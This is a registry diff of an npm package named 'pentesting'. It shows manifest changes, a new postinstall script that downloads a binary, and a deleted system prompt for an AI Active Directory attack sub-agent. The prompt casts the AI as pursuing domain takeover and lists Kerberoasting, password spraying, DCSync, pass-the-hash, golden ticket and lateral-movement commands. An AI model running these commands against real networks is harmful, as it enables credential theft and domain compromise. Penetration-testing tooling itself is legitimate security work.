pentesting 0.73.14 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
package/package.json
CHANGED
|
@@ -1,42 +1,30 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "pentesting",
|
|
3
|
-
"version": "0.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "0.90.1",
|
|
4
|
+
"description": "Public pentesting facade for Builder",
|
|
5
5
|
"type": "module",
|
|
6
|
-
"main": "dist/main.js",
|
|
7
|
-
"types": "dist/main.d.ts",
|
|
8
6
|
"bin": {
|
|
9
|
-
"pentesting": "
|
|
7
|
+
"pentesting": "./bin/pentesting.mjs",
|
|
8
|
+
"builder": "./bin/pentesting.mjs"
|
|
10
9
|
},
|
|
11
10
|
"files": [
|
|
12
|
-
"
|
|
13
|
-
"
|
|
11
|
+
"bin",
|
|
12
|
+
"lib",
|
|
13
|
+
"scripts",
|
|
14
14
|
"README.md"
|
|
15
15
|
],
|
|
16
16
|
"scripts": {
|
|
17
|
-
"
|
|
18
|
-
"dev
|
|
19
|
-
"
|
|
20
|
-
"
|
|
21
|
-
"
|
|
22
|
-
"
|
|
23
|
-
"test:watch": "vitest",
|
|
24
|
-
"lint": "tsc --noEmit",
|
|
25
|
-
"verify": "npm run lint && npm run test && npm run build",
|
|
26
|
-
"verify:docker": "npm run docker:local && bash test.sh",
|
|
27
|
-
"check": "docker system prune -af --volumes && TMPDIR=/tmp npm run test && npm run build && npm run docker:local && bash test.sh",
|
|
28
|
-
"check:ci": "npm run verify && npm run verify:docker",
|
|
29
|
-
"check:clean": "docker system prune -af --volumes && npm run check:ci",
|
|
17
|
+
"postinstall": "node ./scripts/postinstall.mjs",
|
|
18
|
+
"dev": "node ./bin/pentesting.mjs",
|
|
19
|
+
"preflight:local": "bash scripts/preflight-local.sh",
|
|
20
|
+
"test": "node --test tests/*.test.mjs",
|
|
21
|
+
"verify": "npm run preflight:local && npm run test",
|
|
22
|
+
"check": "npm run verify",
|
|
30
23
|
"prepublishOnly": "npm run verify",
|
|
31
|
-
"docker:build": "docker buildx build -f Dockerfile.base --platform linux/amd64,linux/arm64 -t agnusdei1207/pentesting-base:latest --push .",
|
|
32
|
-
"release": "npm run release:patch && npm run release:docker",
|
|
33
24
|
"publish:token": "npm publish --access public",
|
|
34
|
-
"release:patch": "npm version patch && npm run
|
|
35
|
-
"release:minor": "npm version minor && npm run
|
|
36
|
-
"release:major": "npm version major && npm run
|
|
37
|
-
"docker:local": "docker buildx build --load -f Dockerfile -t agnusdei1207/pentesting:latest .",
|
|
38
|
-
"docker:start": "npm run docker:local && docker run -it --rm -e PENTEST_API_KEY -e PENTEST_BASE_URL -e PENTEST_MODEL -e SEARCH_API_KEY -e SEARCH_API_URL -e PENTEST_SCOPE_MODE -e PENTEST_APPROVAL_MODE -e PENTEST_TOR agnusdei1207/pentesting:latest",
|
|
39
|
-
"release:docker": "bash scripts/docker-build-release.sh"
|
|
25
|
+
"release:patch": "npm version patch && npm run verify && npm run publish:token",
|
|
26
|
+
"release:minor": "npm version minor && npm run verify && npm run publish:token",
|
|
27
|
+
"release:major": "npm version major && npm run verify && npm run publish:token"
|
|
40
28
|
},
|
|
41
29
|
"repository": {
|
|
42
30
|
"type": "git",
|
|
@@ -66,23 +54,6 @@
|
|
|
66
54
|
"author": "agnusdei1207",
|
|
67
55
|
"license": "MIT",
|
|
68
56
|
"engines": {
|
|
69
|
-
"node": ">=18.
|
|
70
|
-
},
|
|
71
|
-
"dependencies": {
|
|
72
|
-
"chalk": "^5.6.2",
|
|
73
|
-
"commander": "^14.0.3",
|
|
74
|
-
"ink": "^6.8.0",
|
|
75
|
-
"playwright": "^1.58.2",
|
|
76
|
-
"react": "^19.2.4"
|
|
77
|
-
},
|
|
78
|
-
"devDependencies": {
|
|
79
|
-
"@types/node": "^25.3.0",
|
|
80
|
-
"@types/react": "^19.2.14",
|
|
81
|
-
"esbuild": "^0.27.3",
|
|
82
|
-
"ink-testing-library": "^4.0.0",
|
|
83
|
-
"tsup": "^8.5.1",
|
|
84
|
-
"tsx": "^4.21.0",
|
|
85
|
-
"typescript": "^5.9.3",
|
|
86
|
-
"vitest": "^4.0.18"
|
|
57
|
+
"node": ">=18.18.0"
|
|
87
58
|
}
|
|
88
59
|
}
|
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
import { installManagedBuilder } from "../lib/runtime.mjs";
|
|
2
|
+
|
|
3
|
+
if (process.env.BUILDER_BIN) {
|
|
4
|
+
console.log("[pentesting] BUILDER_BIN is set; skipping managed Builder download.");
|
|
5
|
+
process.exit(0);
|
|
6
|
+
}
|
|
7
|
+
|
|
8
|
+
if (process.env.BUILDER_SKIP_DOWNLOAD === "true") {
|
|
9
|
+
console.log("[pentesting] Skipping managed Builder download.");
|
|
10
|
+
process.exit(0);
|
|
11
|
+
}
|
|
12
|
+
|
|
13
|
+
try {
|
|
14
|
+
const result = await installManagedBuilder({
|
|
15
|
+
force: process.env.BUILDER_FORCE_DOWNLOAD === "true",
|
|
16
|
+
});
|
|
17
|
+
|
|
18
|
+
if (result.source === "cached") {
|
|
19
|
+
console.log("[pentesting] Managed Builder binary already present.");
|
|
20
|
+
} else if (result.source === "downloaded") {
|
|
21
|
+
console.log("[pentesting] Managed Builder binary downloaded successfully.");
|
|
22
|
+
}
|
|
23
|
+
} catch (error) {
|
|
24
|
+
console.error(
|
|
25
|
+
`[pentesting] Failed to provision the managed Builder binary: ${
|
|
26
|
+
error instanceof Error ? error.message : String(error)
|
|
27
|
+
}`,
|
|
28
|
+
);
|
|
29
|
+
process.exit(1);
|
|
30
|
+
}
|
|
@@ -0,0 +1,24 @@
|
|
|
1
|
+
#!/bin/sh
|
|
2
|
+
|
|
3
|
+
set -eu
|
|
4
|
+
|
|
5
|
+
require_command() {
|
|
6
|
+
if ! command -v "$1" >/dev/null 2>&1; then
|
|
7
|
+
echo "Missing required command: $1" >&2
|
|
8
|
+
exit 1
|
|
9
|
+
fi
|
|
10
|
+
}
|
|
11
|
+
|
|
12
|
+
require_path() {
|
|
13
|
+
if [ ! -e "$1" ]; then
|
|
14
|
+
echo "Missing required path: $1" >&2
|
|
15
|
+
exit 1
|
|
16
|
+
fi
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
SCRIPT_DIR=$(CDPATH= cd -- "$(dirname "$0")" && pwd)
|
|
20
|
+
PACKAGE_ROOT=$(CDPATH= cd -- "$SCRIPT_DIR/.." && pwd)
|
|
21
|
+
|
|
22
|
+
require_command node
|
|
23
|
+
require_path "$PACKAGE_ROOT/bin/pentesting.mjs"
|
|
24
|
+
require_path "$PACKAGE_ROOT/lib/runtime.mjs"
|
package/dist/ad/prompt.md
DELETED
|
@@ -1,60 +0,0 @@
|
|
|
1
|
-
# Active Directory — AD Attack Sub-Agent
|
|
2
|
-
|
|
3
|
-
You are an Active Directory attack expert. Your goal is domain takeover through Kerberos, LDAP, and SMB.
|
|
4
|
-
|
|
5
|
-
## Operation Sequence
|
|
6
|
-
1. AD Enumeration → 2. Attack Path Analysis → 3. Credential Acquisition → 4. Escalation → 5. Domain Domination
|
|
7
|
-
|
|
8
|
-
## Execution Commands
|
|
9
|
-
|
|
10
|
-
```bash
|
|
11
|
-
# LDAP Enumeration
|
|
12
|
-
ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName memberOf
|
|
13
|
-
ldapsearch -x -H ldap://<dc> -b "DC=domain,DC=com" "(objectClass=computer)" dNSHostName
|
|
14
|
-
|
|
15
|
-
# CrackMapExec Enumeration
|
|
16
|
-
crackmapexec smb <dc> --users
|
|
17
|
-
crackmapexec smb <dc> --groups
|
|
18
|
-
crackmapexec smb <dc> --shares
|
|
19
|
-
crackmapexec smb <dc> --pass-pol
|
|
20
|
-
|
|
21
|
-
# BloodHound Collection
|
|
22
|
-
bloodhound-python -c All -d <domain> -u <user> -p <pass> -dc <dc>
|
|
23
|
-
|
|
24
|
-
# RPC Enumeration
|
|
25
|
-
rpcclient -U "" -N <dc> -c "enumdomusers;enumdomgroups;querydispinfo"
|
|
26
|
-
|
|
27
|
-
# Kerberoasting
|
|
28
|
-
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc> -request -outputfile kerberoast.txt
|
|
29
|
-
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
|
|
30
|
-
|
|
31
|
-
# AS-REP Roasting
|
|
32
|
-
impacket-GetNPUsers <domain>/ -dc-ip <dc> -usersfile users.txt -format hashcat
|
|
33
|
-
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
|
|
34
|
-
|
|
35
|
-
# Password Spraying
|
|
36
|
-
crackmapexec smb <dc> -u users.txt -p 'Company2024!' --continue-on-success
|
|
37
|
-
|
|
38
|
-
# DCSync
|
|
39
|
-
impacket-secretsdump <domain>/<admin>:<pass>@<dc>
|
|
40
|
-
|
|
41
|
-
# Pass-the-Hash
|
|
42
|
-
impacket-psexec -hashes :<ntlm> <domain>/<user>@<target>
|
|
43
|
-
crackmapexec smb <targets> -u <user> -H <ntlm>
|
|
44
|
-
|
|
45
|
-
# Golden Ticket
|
|
46
|
-
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> administrator
|
|
47
|
-
|
|
48
|
-
# Lateral Movement
|
|
49
|
-
impacket-wmiexec <domain>/<user>:<pass>@<target>
|
|
50
|
-
evil-winrm -i <target> -u <user> -p <pass>
|
|
51
|
-
```
|
|
52
|
-
|
|
53
|
-
## Output
|
|
54
|
-
```
|
|
55
|
-
[domain] CORP.LOCAL
|
|
56
|
-
[users] 500 users (Domain Admins: 5)
|
|
57
|
-
[attack] Kerberoastable: 3, AS-REP: 2, Unconstrained delegation: 1
|
|
58
|
-
[path] svc_sql → Kerberoast → MSSQL Admin → DCSync → DA
|
|
59
|
-
[action] Proceed with hash cracking after Kerberoasting
|
|
60
|
-
```
|